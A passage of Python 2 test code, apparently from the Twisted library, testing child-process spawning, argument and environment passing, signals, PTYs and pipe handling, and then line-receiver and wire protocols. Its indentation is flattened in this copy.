Helper class for launching a Python process and getting a result from it.
@ivar program: A string giving a Python program for the child process to
run.
"""
program = None
def run(cls, reactor, argv, env):
"""
Run a Python process connected to a new instance of this protocol
class. Return the protocol instance.
The Python process is given C{self.program} on the command line to
execute, in addition to anything specified by C{argv}. C{env} is
the complete environment.
"""
exe = sys.executable
self = cls()
reactor.spawnProcess(
self, exe, [exe, "-c", self.program] + argv, env=env)
return self
run = classmethod(run)
def __init__(self):
self.bytes = []
self.requests = []
def parseChunks(self, bytes):
"""
Called with all bytes received on stdout when the process exits.
"""
raise NotImplementedError()
def getResult(self):
"""
Return a Deferred which will fire with the result of L{parseChunks}
when the child process exits.
"""
d = Deferred()
self.requests.append(d)
return d
def _fireResultDeferreds(self, result):
"""
Callback all Deferreds returned up until now by L{getResult}
with the given result object.
"""
requests = self.requests
self.requests = None
for d in requests:
d.callback(result)
def outReceived(self, bytes):
"""
Accumulate output from the child process in a list.
"""
self.bytes.append(bytes)
def processEnded(self, reason):
"""
Handle process termination by parsing all received output and firing
any waiting Deferreds.
"""
self._fireResultDeferreds(self.parseChunks(self.bytes))
class GetArgumentVector(UtilityProcessProtocol):
"""
Protocol which will read a serialized argv from a process and
expose it to interested parties.
"""
program = (
"from sys import stdout, argv\n"
"stdout.write(chr(0).join(argv))\n"
"stdout.flush()\n")
def parseChunks(self, chunks):
"""
Parse the output from the process to which this protocol was
connected, which is a single unterminated line of \\0-separated
strings giving the argv of that process. Return this as a list of
str objects.
"""
return ''.join(chunks).split('\0')
class GetEnvironmentDictionary(UtilityProcessProtocol):
"""
Protocol which will read a serialized environment dict from a process
and expose it to interested parties.
"""
program = (
"from sys import stdout\n"
"from os import environ\n"
"items = environ.iteritems()\n"
"stdout.write(chr(0).join([k + chr(0) + v for k, v in items]))\n"
"stdout.flush()\n")
def parseChunks(self, chunks):
"""
Parse the output from the process to which this protocol was
connected, which is a single unterminated line of \\0-separated
strings giving key value pairs of the environment from that process.
Return this as a dictionary.
"""
environString = ''.join(chunks)
if not environString:
return {}
environ = iter(environString.split('\0'))
d = {}
while 1:
try:
k = environ.next()
except StopIteration:
break
else:
v = environ.next()
d[k] = v
return d
class ProcessTestCase(SignalMixin, unittest.TestCase):
"""Test running a process."""
usePTY = False
def testStdio(self):
"""twisted.internet.stdio test."""
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_twisted.py")
p = Accumulator()
d = p.endedDeferred = defer.Deferred()
env = {"PYTHONPATH": os.pathsep.join(sys.path)}
reactor.spawnProcess(p, exe, [exe, "-u", scriptPath], env=env,
path=None, usePTY=self.usePTY)
p.transport.write("hello, world")
p.transport.write("abc")
p.transport.write("123")
p.transport.closeStdin()
def processEnded(ign):
self.assertEquals(p.outF.getvalue(), "hello, worldabc123",
"Output follows:\n"
"%s\n"
"Error message from process_twisted follows:\n"
"%s\n" % (p.outF.getvalue(), p.errF.getvalue()))
return d.addCallback(processEnded)
def testProcess(self):
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_tester.py")
d = defer.Deferred()
p = TestProcessProtocol()
p.deferred = d
reactor.spawnProcess(p, exe, [exe, "-u", scriptPath], env=None)
def check(ignored):
self.assertEquals(p.stages, [1, 2, 3, 4, 5])
f = p.reason
f.trap(error.ProcessTerminated)
self.assertEquals(f.value.exitCode, 23)
# would .signal be available on non-posix?
# self.assertEquals(f.value.signal, None)
try:
import process_tester, glob
for f in glob.glob(process_tester.test_file_match):
os.remove(f)
except:
pass
d.addCallback(check)
return d
def testManyProcesses(self):
def _check(results, protocols):
for p in protocols:
self.assertEquals(p.stages, [1, 2, 3, 4, 5], "[%d] stages = %s" % (id(p.transport), str(p.stages)))
# test status code
f = p.reason
f.trap(error.ProcessTerminated)
self.assertEquals(f.value.exitCode, 23)
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_tester.py")
args = [exe, "-u", scriptPath]
protocols = []
deferreds = []
for i in xrange(50):
p = TestManyProcessProtocol()
protocols.append(p)
reactor.spawnProcess(p, exe, args, env=None)
deferreds.append(p.deferred)
deferredList = defer.DeferredList(deferreds, consumeErrors=True)
deferredList.addCallback(_check, protocols)
return deferredList
def testEcho(self):
finished = defer.Deferred()
p = EchoProtocol(finished)
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_echoer.py")
reactor.spawnProcess(p, exe, [exe, "-u", scriptPath], env=None)
def asserts(ignored):
self.failIf(p.failure, p.failure)
self.failUnless(hasattr(p, 'buffer'))
self.assertEquals(len(''.join(p.buffer)), len(p.s * p.n))
def takedownProcess(err):
p.transport.closeStdin()
return err
return finished.addCallback(asserts).addErrback(takedownProcess)
testEcho.timeout = 60 # XXX This should not be. There is already a
# global timeout value. Why do you think this
# test can complete more quickly?
def testCommandLine(self):
args = [r'a\"b ', r'a\b ', r' a\\"b', r' a\\b', r'"foo bar" "', '\tab', '"\\', 'a"b', "a'b"]
pyExe = sys.executable
scriptPath = util.sibpath(__file__, "process_cmdline.py")
p = Accumulator()
d = p.endedDeferred = defer.Deferred()
reactor.spawnProcess(p, pyExe, [pyExe, "-u", scriptPath]+args, env=None,
path=None)
def processEnded(ign):
self.assertEquals(p.errF.getvalue(), "")
recvdArgs = p.outF.getvalue().splitlines()
self.assertEquals(recvdArgs, args)
return d.addCallback(processEnded)
def test_wrongArguments(self):
"""
Test invalid arguments to spawnProcess: arguments and environment
must only contains string or unicode, and not null bytes.
"""
exe = sys.executable
p = protocol.ProcessProtocol()
badEnvs = [
{"foo": 2},
{"foo": "egg\0a"},
{3: "bar"},
{"bar\0foo": "bar"}]
badArgs = [
[exe, 2],
"spam",
[exe, "foo\0bar"]]
# Sanity check - this will fail for people who have mucked with
# their site configuration in a stupid way, but there's nothing we
# can do about that.
badUnicode = u'\N{SNOWMAN}'
try:
badUnicode.encode(sys.getdefaultencoding())
except UnicodeEncodeError:
# Okay, that unicode doesn't encode, put it in as a bad environment
# key.
badEnvs.append({badUnicode: 'value for bad unicode key'})
badEnvs.append({'key for bad unicode value': badUnicode})
badArgs.append([exe, badUnicode])
else:
# It _did_ encode. Most likely, Gtk2 is being used and the
# default system encoding is UTF-8, which can encode anything.
# In any case, if implicit unicode -> str conversion works for
# that string, we can't test that TypeError gets raised instead,
# so just leave it off.
pass
for env in badEnvs:
self.assertRaises(
TypeError,
reactor.spawnProcess, p, exe, [exe, "-c", ""], env=env)
for args in badArgs:
self.assertRaises(
TypeError,
reactor.spawnProcess, p, exe, args, env=None)
# Use upper-case so that the environment key test uses an upper case
# name: some versions of Windows only support upper case environment
# variable names, and I think Python (as of 2.5) doesn't use the right
# syscall for lowercase or mixed case names to work anyway.
okayUnicode = u"UNICODE"
encodedValue = "UNICODE"
def _deprecatedUnicodeSupportTest(self, processProtocolClass, argv=[], env={}):
"""
Check that a deprecation warning is emitted when passing unicode to
spawnProcess for an argv value or an environment key or value.
Check that the warning is of the right type, has the right message,
and refers to the correct file. Unfortunately, don't check that the
line number is correct, because that is too hard for me to figure
out.
@param processProtocolClass: A L{UtilityProcessProtocol} subclass
which will be instantiated to communicate with the child process.
@param argv: The argv argument to spawnProcess.
@param env: The env argument to spawnProcess.
@return: A Deferred which fires when the test is complete.
"""
# Sanity to check to make sure we can actually encode this unicode
# with the default system encoding. This may be excessively
# paranoid. -exarkun
self.assertEqual(
self.okayUnicode.encode(sys.getdefaultencoding()),
self.encodedValue)
warningsShown = []
def showwarning(*args):
warningsShown.append(args)
origshow = warnings.showwarning
origregistry = globals().get('__warningregistry__', {})
try:
warnings.showwarning = showwarning
globals()['__warningregistry__'] = {}
p = processProtocolClass.run(reactor, argv, env)
finally:
warnings.showwarning = origshow
globals()['__warningregistry__'] = origregistry
d = p.getResult()
self.assertEqual(len(warningsShown), 1, pformat(warningsShown))
message, category, filename, lineno = warningsShown[0]
self.assertEqual(
message.args,
("Argument strings and environment keys/values passed to "
"reactor.spawnProcess should be str, not unicode.",))
self.assertIdentical(category, DeprecationWarning)
# Use starts with because of .pyc/.pyo issues.
self.failUnless(
__file__.startswith(filename),
'Warning in %r, expected %r' % (filename, __file__))
# It would be nice to be able to check the line number as well, but
# different configurations actually end up reporting different line
# numbers (generally the variation is only 1 line, but that's enough
# to fail the test erroneously...).
# self.assertEqual(lineno, 202)
return d
def test_deprecatedUnicodeArgvSupport(self):
"""
Test that a unicode string passed for an argument value is allowed
if it can be encoded with the default system encoding, but that a
deprecation warning is emitted.
"""
d = self._deprecatedUnicodeSupportTest(GetArgumentVector, argv=[self.okayUnicode])
def gotArgVector(argv):
self.assertEqual(argv, ['-c', self.encodedValue])
d.addCallback(gotArgVector)
return d
def test_deprecatedUnicodeEnvKeySupport(self):
"""
Test that a unicode string passed for the key of the environment
dictionary is allowed if it can be encoded with the default system
encoding, but that a deprecation warning is emitted.
"""
d = self._deprecatedUnicodeSupportTest(
GetEnvironmentDictionary, env={self.okayUnicode: self.encodedValue})
def gotEnvironment(environ):
self.assertEqual(environ[self.encodedValue], self.encodedValue)
d.addCallback(gotEnvironment)
return d
def test_deprecatedUnicodeEnvValueSupport(self):
"""
Test that a unicode string passed for the value of the environment
dictionary is allowed if it can be encoded with the default system
encoding, but that a deprecation warning is emitted.
"""
d = self._deprecatedUnicodeSupportTest(
GetEnvironmentDictionary, env={self.encodedValue: self.okayUnicode})
def gotEnvironment(environ):
# On Windows, the environment contains more things than we
# specified, so only make sure that at least the key we wanted
# is there, rather than testing the dictionary for exact
# equality.
self.assertEqual(environ[self.encodedValue], self.encodedValue)
d.addCallback(gotEnvironment)
return d
class TwoProcessProtocol(protocol.ProcessProtocol):
num = -1
finished = 0
def __init__(self):
self.deferred = defer.Deferred()
def outReceived(self, data):
pass
def processEnded(self, reason):
self.finished = 1
self.deferred.callback(None)
class TestTwoProcessesBase:
def setUp(self):
self.processes = [None, None]
self.pp = [None, None]
self.done = 0
self.verbose = 0
def createProcesses(self, usePTY=0):
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_reader.py")
for num in (0,1):
self.pp[num] = TwoProcessProtocol()
self.pp[num].num = num
p = reactor.spawnProcess(self.pp[num],
exe, [exe, "-u", scriptPath], env=None,
usePTY=usePTY)
self.processes[num] = p
def close(self, num):
if self.verbose: print "closing stdin [%d]" % num
p = self.processes[num]
pp = self.pp[num]
self.failIf(pp.finished, "Process finished too early")
p.loseConnection()
if self.verbose: print self.pp[0].finished, self.pp[1].finished
def _onClose(self):
return defer.gatherResults([ p.deferred for p in self.pp ])
def testClose(self):
if self.verbose: print "starting processes"
self.createProcesses()
reactor.callLater(1, self.close, 0)
reactor.callLater(2, self.close, 1)
return self._onClose()
class TestTwoProcessesNonPosix(TestTwoProcessesBase, SignalMixin, unittest.TestCase):
pass
class TestTwoProcessesPosix(TestTwoProcessesBase, SignalMixin, unittest.TestCase):
def tearDown(self):
for i in (0,1):
pp, process = self.pp[i], self.processes[i]
if not pp.finished:
try:
os.kill(process.pid, signal.SIGTERM)
except OSError:
print "OSError"
return self._onClose()
def kill(self, num):
if self.verbose: print "kill [%d] with SIGTERM" % num
p = self.processes[num]
pp = self.pp[num]
self.failIf(pp.finished, "Process finished too early")
os.kill(p.pid, signal.SIGTERM)
if self.verbose: print self.pp[0].finished, self.pp[1].finished
def testKill(self):
if self.verbose: print "starting processes"
self.createProcesses(usePTY=0)
reactor.callLater(1, self.kill, 0)
reactor.callLater(2, self.kill, 1)
return self._onClose()
def testClosePty(self):
if self.verbose: print "starting processes"
self.createProcesses(usePTY=1)
reactor.callLater(1, self.close, 0)
reactor.callLater(2, self.close, 1)
return self._onClose()
def testKillPty(self):
if self.verbose: print "starting processes"
self.createProcesses(usePTY=1)
reactor.callLater(1, self.kill, 0)
reactor.callLater(2, self.kill, 1)
return self._onClose()
class FDChecker(protocol.ProcessProtocol):
state = 0
data = ""
failed = None
def __init__(self, d):
self.deferred = d
def fail(self, why):
self.failed = why
self.deferred.callback(None)
def connectionMade(self):
self.transport.writeToChild(0, "abcd")
self.state = 1
def childDataReceived(self, childFD, data):
#print "[%d] dataReceived(%d,%s)" % (self.state, childFD, data)
if self.state == 1:
if childFD != 1:
self.fail("read '%s' on fd %d (not 1) during state 1" \
% (childFD, data))
return
self.data += data
#print "len", len(self.data)
if len(self.data) == 6:
if self.data != "righto":
self.fail("got '%s' on fd1, expected 'righto'" \
% self.data)
return
self.data = ""
self.state = 2
#print "state2", self.state
self.transport.writeToChild(3, "efgh")
return
if self.state == 2:
self.fail("read '%s' on fd %s during state 2" % (childFD, data))
return
if self.state == 3:
if childFD != 1:
self.fail("read '%s' on fd %s (not 1) during state 3" \
% (childFD, data))
return
self.data += data
if len(self.data) == 6:
if self.data != "closed":
self.fail("got '%s' on fd1, expected 'closed'" \
% self.data)
return
self.state = 4
return
if self.state == 4:
self.fail("read '%s' on fd %s during state 4" % (childFD, data))
return
def childConnectionLost(self, childFD):
#print "[%d] connectionLost(%d)" % (self.state, childFD)
if self.state == 1:
self.fail("got connectionLost(%d) during state 1" % childFD)
return
if self.state == 2:
if childFD != 4:
self.fail("got connectionLost(%d) (not 4) during state 2" \
% childFD)
return
self.state = 3
self.transport.closeChildFD(5)
return
def processEnded(self, status):
#print "[%d] processEnded" % self.state
rc = status.value.exitCode
if self.state != 4:
self.fail("processEnded early, rc %d" % rc)
return
if status.value.signal != None:
self.fail("processEnded with signal %s" % status.value.signal)
return
if rc != 0:
self.fail("processEnded with rc %d" % rc)
return
self.deferred.callback(None)
class FDTest(SignalMixin, unittest.TestCase):
def NOTsetUp(self):
from twisted.internet import process
process.Process.debug_child = True
def NOTtearDown(self):
from twisted.internet import process
process.Process.debug_child = False
def testFD(self):
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_fds.py")
d = defer.Deferred()
p = FDChecker(d)
reactor.spawnProcess(p, exe, [exe, "-u", scriptPath], env=None,
path=None,
childFDs={0:"w", 1:"r", 2:2,
3:"w", 4:"r", 5:"w"})
d.addCallback(lambda x : self.failIf(p.failed, p.failed))
return d
def testLinger(self):
# See what happens when all the pipes close before the process
# actually stops. This test *requires* SIGCHLD catching to work,
# as there is no other way to find out the process is done.
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_linger.py")
p = Accumulator()
d = p.endedDeferred = defer.Deferred()
reactor.spawnProcess(p, exe, [exe, "-u", scriptPath], env=None,
path=None,
childFDs={1:"r", 2:2},
)
def processEnded(ign):
self.failUnlessEqual(p.outF.getvalue(),
"here is some text\ngoodbye\n")
return d.addCallback(processEnded)
class Accumulator(protocol.ProcessProtocol):
"""Accumulate data from a process."""
closed = 0
endedDeferred = None
def connectionMade(self):
# print "connection made"
self.outF = StringIO.StringIO()
self.errF = StringIO.StringIO()
def outReceived(self, d):
# print "data", repr(d)
self.outF.write(d)
def errReceived(self, d):
# print "err", repr(d)
self.errF.write(d)
def outConnectionLost(self):
# print "out closed"
pass
def errConnectionLost(self):
# print "err closed"
pass
def processEnded(self, reason):
self.closed = 1
if self.endedDeferred is not None:
d, self.endedDeferred = self.endedDeferred, None
d.callback(None)
class PosixProcessBase:
"""Test running processes."""
usePTY = 0
def testNormalTermination(self):
if os.path.exists('/bin/true'): cmd = '/bin/true'
elif os.path.exists('/usr/bin/true'): cmd = '/usr/bin/true'
else: raise RuntimeError("true not found in /bin or /usr/bin")
d = defer.Deferred()
p = TrivialProcessProtocol(d)
reactor.spawnProcess(p, cmd, ['true'], env=None,
usePTY=self.usePTY)
def check(ignored):
p.reason.trap(error.ProcessDone)
self.assertEquals(p.reason.value.exitCode, 0)
self.assertEquals(p.reason.value.signal, None)
d.addCallback(check)
return d
def testAbnormalTermination(self):
if os.path.exists('/bin/false'): cmd = '/bin/false'
elif os.path.exists('/usr/bin/false'): cmd = '/usr/bin/false'
else: raise RuntimeError("false not found in /bin or /usr/bin")
d = defer.Deferred()
p = TrivialProcessProtocol(d)
reactor.spawnProcess(p, cmd, ['false'], env=None,
usePTY=self.usePTY)
def check(ignored):
p.reason.trap(error.ProcessTerminated)
self.assertEquals(p.reason.value.exitCode, 1)
self.assertEquals(p.reason.value.signal, None)
d.addCallback(check)
return d
def _testSignal(self, sig):
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_signal.py")
d = defer.Deferred()
p = SignalProtocol(d, sig)
reactor.spawnProcess(p, exe, [exe, "-u", scriptPath, sig],
env=None,
usePTY=self.usePTY)
return d
def testSignalHUP(self):
d = self._testSignal('HUP')
d.addCallback(self.failIf)
return d
def testSignalINT(self):
d = self._testSignal('INT')
d.addCallback(self.failIf)
return d
def testSignalKILL(self):
d = self._testSignal('KILL')
d.addCallback(self.failIf)
return d
class PosixProcessTestCase(SignalMixin, unittest.TestCase, PosixProcessBase):
# add three non-pty test cases
def testStderr(self):
# we assume there is no file named ZZXXX..., both in . and in /tmp
if not os.path.exists('/bin/ls'):
raise RuntimeError("/bin/ls not found")
p = Accumulator()
d = p.endedDeferred = defer.Deferred()
reactor.spawnProcess(p, '/bin/ls',
["/bin/ls",
"ZZXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"],
env=None, path="/tmp",
usePTY=self.usePTY)
def processEnded(ign):
self.assertEquals(lsOut, p.errF.getvalue())
return d.addCallback(processEnded)
def testProcess(self):
if os.path.exists('/bin/gzip'): cmd = '/bin/gzip'
elif os.path.exists('/usr/bin/gzip'): cmd = '/usr/bin/gzip'
else: raise RuntimeError("gzip not found in /bin or /usr/bin")
s = "there's no place like home!\n" * 3
p = Accumulator()
d = p.endedDeferred = defer.Deferred()
reactor.spawnProcess(p, cmd, [cmd, "-c"], env=None, path="/tmp",
usePTY=self.usePTY)
p.transport.write(s)
p.transport.closeStdin()
def processEnded(ign):
f = p.outF
f.seek(0, 0)
gf = gzip.GzipFile(fileobj=f)
self.assertEquals(gf.read(), s)
return d.addCallback(processEnded)
class PosixProcessTestCasePTY(SignalMixin, unittest.TestCase, PosixProcessBase):
"""Just like PosixProcessTestCase, but use ptys instead of pipes."""
usePTY = 1
# PTYs only offer one input and one output. What still makes sense?
# testNormalTermination
# testAbnormalTermination
# testSignal
# testProcess, but not without p.transport.closeStdin
# might be solveable: TODO: add test if so
def testOpeningTTY(self):
exe = sys.executable
scriptPath = util.sibpath(__file__, "process_tty.py")
p = Accumulator()
d = p.endedDeferred = defer.Deferred()
reactor.spawnProcess(p, exe, [exe, "-u", scriptPath], env=None,
path=None, usePTY=self.usePTY)
p.transport.write("hello world!\n")
def processEnded(ign):
self.assertEquals(
p.outF.getvalue(),
"hello world!\r\nhello world!\r\n",
"Error message from process_tty follows:\n\n%s\n\n" % p.outF.getvalue())
return d.addCallback(processEnded)
def testBadArgs(self):
pyExe = sys.executable
pyArgs = [pyExe, "-u", "-c", "print 'hello'"]
p = Accumulator()
self.assertRaises(ValueError, reactor.spawnProcess, p, pyExe, pyArgs, usePTY=1, childFDs={1:'r'})
class Win32ProcessTestCase(SignalMixin, unittest.TestCase):
"""Test process programs that are packaged with twisted."""
def testStdinReader(self):
pyExe = sys.executable
scriptPath = util.sibpath(__file__, "process_stdinreader.py")
p = Accumulator()
d = p.endedDeferred = defer.Deferred()
reactor.spawnProcess(p, pyExe, [pyExe, "-u", scriptPath], env=None,
path=None)
p.transport.write("hello, world")
p.transport.closeStdin()
def processEnded(ign):
self.assertEquals(p.errF.getvalue(), "err\nerr\n")
self.assertEquals(p.outF.getvalue(), "out\nhello, world\nout\n")
return d.addCallback(processEnded)
def testBadArgs(self):
pyExe = sys.executable
pyArgs = [pyExe, "-u", "-c", "print 'hello'"]
p = Accumulator()
self.assertRaises(ValueError, reactor.spawnProcess, p, pyExe, pyArgs, uid=1)
self.assertRaises(ValueError, reactor.spawnProcess, p, pyExe, pyArgs, gid=1)
self.assertRaises(ValueError, reactor.spawnProcess, p, pyExe, pyArgs, usePTY=1)
self.assertRaises(ValueError, reactor.spawnProcess, p, pyExe, pyArgs, childFDs={1:'r'})
class UtilTestCase(unittest.TestCase):
"""
Tests for process-related helper functions (currently only
L{procutils.which}.
"""
def setUp(self):
"""
Create several directories and files, some of which are executable
and some of which are not. Save the current PATH setting.
"""
j = os.path.join
base = self.mktemp()
self.foo = j(base, "foo")
self.baz = j(base, "baz")
self.foobar = j(self.foo, "bar")
self.foobaz = j(self.foo, "baz")
self.bazfoo = j(self.baz, "foo")
self.bazbar = j(self.baz, "bar")
for d in self.foobar, self.foobaz, self.bazfoo, self.bazbar:
os.makedirs(d)
for name, mode in [(j(self.foobaz, "executable"), 0700),
(j(self.foo, "executable"), 0700),
(j(self.bazfoo, "executable"), 0700),
(j(self.bazfoo, "executable.bin"), 0700),
(j(self.bazbar, "executable"), 0)]:
f = file(name, "w")
f.close()
os.chmod(name, mode)
self.oldPath = os.environ.get('PATH', None)
os.environ['PATH'] = os.pathsep.join((
self.foobar, self.foobaz, self.bazfoo, self.bazbar))
def tearDown(self):
"""
Restore the saved PATH setting.
"""
if self.oldPath is None:
try:
del os.environ['PATH']
except KeyError:
pass
else:
os.environ['PATH'] = self.oldPath
def test_whichWithoutPATH(self):
"""
Test that if C{os.environ} does not have a C{'PATH'} key,
L{procutils.which} returns an empty list.
"""
del os.environ['PATH']
self.assertEqual(procutils.which("executable"), [])
def testWhich(self):
j = os.path.join
paths = procutils.which("executable")
expectedPaths = [j(self.foobaz, "executable"),
j(self.bazfoo, "executable")]
if runtime.platform.isWindows():
expectedPaths.append(j(self.bazbar, "executable"))
self.assertEquals(paths, expectedPaths)
def testWhichPathExt(self):
j = os.path.join
old = os.environ.get('PATHEXT', None)
os.environ['PATHEXT'] = os.pathsep.join(('.bin', '.exe', '.sh'))
try:
paths = procutils.which("executable")
finally:
if old is None:
del os.environ['PATHEXT']
else:
os.environ['PATHEXT'] = old
expectedPaths = [j(self.foobaz, "executable"),
j(self.bazfoo, "executable"),
j(self.bazfoo, "executable.bin")]
if runtime.platform.isWindows():
expectedPaths.append(j(self.bazbar, "executable"))
self.assertEquals(paths, expectedPaths)
class ClosingPipesProcessProtocol(protocol.ProcessProtocol):
output = ''
errput = ''
def __init__(self, outOrErr):
self.deferred = defer.Deferred()
self.outOrErr = outOrErr
def processEnded(self, reason):
self.deferred.callback(reason)
def outReceived(self, data):
self.output += data
def errReceived(self, data):
self.errput += data
class ClosingPipes(unittest.TestCase):
def doit(self, fd):
p = ClosingPipesProcessProtocol(True)
p.deferred.addCallbacks(
callback=lambda _: self.fail("I wanted an errback."),
errback=self._endProcess, errbackArgs=(p,))
reactor.spawnProcess(p, sys.executable,
[sys.executable, '-u', '-c',
r'raw_input(); import sys, os; os.write(%d, "foo\n"); sys.exit(42)' % fd],
env=None)
p.transport.write('go\n')
if fd == 1:
p.transport.closeStdout()
elif fd == 2:
p.transport.closeStderr()
else:
raise RuntimeError
# make the buggy case not hang
p.transport.closeStdin()
return p.deferred
def _endProcess(self, reason, p):
self.failIf(reason.check(error.ProcessDone),
'Child should fail due to EPIPE.')
reason.trap(error.ProcessTerminated)
# child must not get past that write without raising
self.failIfEqual(reason.value.exitCode, 42,
'process reason was %r' % reason)
self.failUnlessEqual(p.output, '')
return p.errput
def test_stdout(self):
"""ProcessProtocol.transport.closeStdout actually closes the pipe."""
d = self.doit(1)
def _check(errput):
self.failIfEqual(errput.find('OSError'), -1)
if runtime.platform.getType() != 'win32':
self.failIfEqual(errput.find('Broken pipe'), -1)
d.addCallback(_check)
return d
def test_stderr(self):
"""ProcessProtocol.transport.closeStderr actually closes the pipe."""
d = self.doit(2)
def _check(errput):
# there should be no stderr open, so nothing for it to
# write the error to.
self.failUnlessEqual(errput, '')
d.addCallback(_check)
return d
skipMessage = "wrong platform or reactor doesn't support IReactorProcess"
if (runtime.platform.getType() != 'posix') or (not interfaces.IReactorProcess(reactor, None)):
PosixProcessTestCase.skip = skipMessage
PosixProcessTestCasePTY.skip = skipMessage
TestTwoProcessesPosix.skip = skipMessage
FDTest.skip = skipMessage
else:
# do this before running the tests: it uses SIGCHLD and stuff internally
lsOut = popen2.popen3("/bin/ls ZZXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX")[2].read()
if (runtime.platform.getType() != 'win32') or (not interfaces.IReactorProcess(reactor, None)):
Win32ProcessTestCase.skip = skipMessage
TestTwoProcessesNonPosix.skip = skipMessage
if not interfaces.IReactorProcess(reactor, None):
ProcessTestCase.skip = skipMessage
ClosingPipes.skip = skipMessage
```
#### File: twisted/test/test_protocols.py
```python
from twisted.trial import unittest
from twisted.protocols import basic, wire, portforward
from twisted.internet import reactor, protocol, defer, task, error
import struct
import StringIO
class StringIOWithoutClosing(StringIO.StringIO):
"""
A StringIO that can't be closed.
"""
def close(self):
"""
Do nothing.
"""
class LineTester(basic.LineReceiver):
"""
A line receiver that parses data received and make actions on some tokens.
@type delimiter: C{str}
@ivar delimiter: character used between received lines.
@type MAX_LENGTH: C{int}
@ivar MAX_LENGTH: size of a line when C{lineLengthExceeded} will be called.
@type clock: L{twisted.internet.task.Clock}
@ivar clock: clock simulating reactor callLater. Pass it to constructor if
you want to use the pause/rawpause functionalities.
"""
delimiter = '\n'
MAX_LENGTH = 64
def __init__(self, clock=None):
"""
If given, use a clock to make callLater calls.
"""
self.clock = clock
def connectionMade(self):
"""
Create/clean data received on connection.
"""
self.received = []
def lineReceived(self, line):
"""
Receive line and make some action for some tokens: pause, rawpause,
stop, len, produce, unproduce.
"""
self.received.append(line)
if line == '':
self.setRawMode()
elif line == 'pause':
self.pauseProducing()
self.clock.callLater(0, self.resumeProducing)
elif line == 'rawpause':
self.pauseProducing()
self.setRawMode()
self.received.append('')
self.clock.callLater(0, self.resumeProducing)
elif line == 'stop':
self.stopProducing()
elif line[:4] == 'len ':
self.length = int(line[4:])
elif line.startswith('produce'):
self.transport.registerProducer(self, False)
elif line.startswith('unproduce'):
self.transport.unregisterProducer()
def rawDataReceived(self, data):
"""
Read raw data, until the quantity specified by a previous 'len' line is
reached.
"""
data, rest = data[:self.length], data[self.length:]
self.length = self.length - len(data)
self.received[-1] = self.received[-1] + data
if self.length == 0:
self.setLineMode(rest)
def lineLengthExceeded(self, line):
"""
Adjust line mode when long lines received.
"""
if len(line) > self.MAX_LENGTH + 1:
self.setLineMode(line[self.MAX_LENGTH + 1:])
class LineOnlyTester(basic.LineOnlyReceiver):
"""
A buffering line only receiver.
"""
delimiter = '\n'
MAX_LENGTH = 64
def connectionMade(self):
"""
Create/clean data received on connection.
"""
self.received = []
def lineReceived(self, line):
"""
Save received data.
"""
self.received.append(line)
class WireTestCase(unittest.TestCase):
"""
Test wire protocols.
"""
def testEcho(self):
"""
Test wire.Echo protocol: send some data and check it send it back.
"""
t = StringIOWithoutClosing()
a = wire.Echo()
a.makeConnection(protocol.FileWrapper(t))
a.dataReceived("hello")
a.dataReceived("world")
a.dataReceived("how")
a.dataReceived("are")
a.dataReceived("you")
self.failUnlessEqual(t.getvalue(), "helloworldhowareyou")
def testWho(self):
"""
Test wire.Who protocol.
"""
t = StringIOWithoutClosing()
a = wire.Who()
a.makeConnection(protocol.FileWrapper(t))
self.failUnlessEqual(t.getvalue(), "root\r\n")
def testQOTD(self):
"""
Test wire.QOTD protocol.
"""
t = StringIOWithoutClosing()
a = wire.QOTD()
a.makeConnection(protocol.FileWrapper(t))
self.failUnlessEqual(t.getvalue(),
"An apple a day keeps the doctor away.\r\n")
def testDiscard(self):
"""
Test wire.Discard protocol.
"""
t = StringIOWithoutClosing()
a = wire.Discard()
a.makeConnection(protocol.FileWrapper(t))
a.dataReceived("hello")
a.dataReceived("world")
a.dataReceived("how")
a.dataReceived("are")
a.dataReceived("you")
self.failUnlessEqual(t.getvalue(), "")
class LineReceiverTestCase(unittest.TestCase):
"""
Test LineReceiver, using the C{LineTester} wrapper.
"""
buffer = '''\
len 10
0123456789len 5
1234
len 20
foo 123
0123456789
012345678len 0
foo 5
1234567890123456789012345678901234567890123456789012345678901234567890
len 1
a'''
output = ['len 10', '0123456789', 'len 5', '1234\n',
'len 20', 'foo 123', '0123456789\n012345678',
'len 0', 'foo 5', '', '67890', 'len 1', 'a']
def testBuffer(self):
"""
Test buffering for different packet size, checking received matches
expected data.
"""
for packet_size in range(1, 10):
t = StringIOWithoutClosing()
a = LineTester()
a.makeConnection(protocol.FileWrapper(t))
for i in range(len(self.buffer)/packet_size + 1):
s = self.buffer[i*packet_size:(i+1)*packet_size]
a.dataReceived(s)
self.failUnlessEqual(self.output, a.received)
pause_buf = 'twiddle1\ntwiddle2\npause\ntwiddle3\n'
pause_output1 = ['twiddle1', 'twiddle2', 'pause']
pause_output2 = pause_output1+['twiddle3']
def testPausing(self):
"""
Test pause inside data receiving. It uses fake clock to see if
pausing/resuming work.
"""
for packet_size in range(1, 10):
t = StringIOWithoutClosing()
clock = task.Clock()
a = LineTester(clock)
a.makeConnection(protocol.FileWrapper(t))
for i in range(len(self.pause_buf)/packet_size + 1):
s = self.pause_buf[i*packet_size:(i+1)*packet_size]
a.dataReceived(s)
self.failUnlessEqual(self.pause_output1, a.received)
clock.advance(0)
self.failUnlessEqual(self.pause_output2, a.received)
rawpause_buf = 'twiddle1\ntwiddle2\nlen 5\nrawpause\n12345twiddle3\n'
rawpause_output1 = ['twiddle1', 'twiddle2', 'len 5', 'rawpause', '']
rawpause_output2 = ['twiddle1', 'twiddle2', 'len 5', 'rawpause', '12345',
'twiddle3']
def testRawPausing(self):
"""
Test pause inside raw date receiving.
"""
for packet_size in range(1, 10):
t = StringIOWithoutClosing()
clock = task.Clock()
a = LineTester(clock)
a.makeConnection(protocol.FileWrapper(t))
for i in range(len(self.rawpause_buf)/packet_size + 1):
s = self.rawpause_buf[i*packet_size:(i+1)*packet_size]
a.dataReceived(s)
self.failUnlessEqual(self.rawpause_output1, a.received)
clock.advance(0)
self.failUnlessEqual(self.rawpause_output2, a.received)
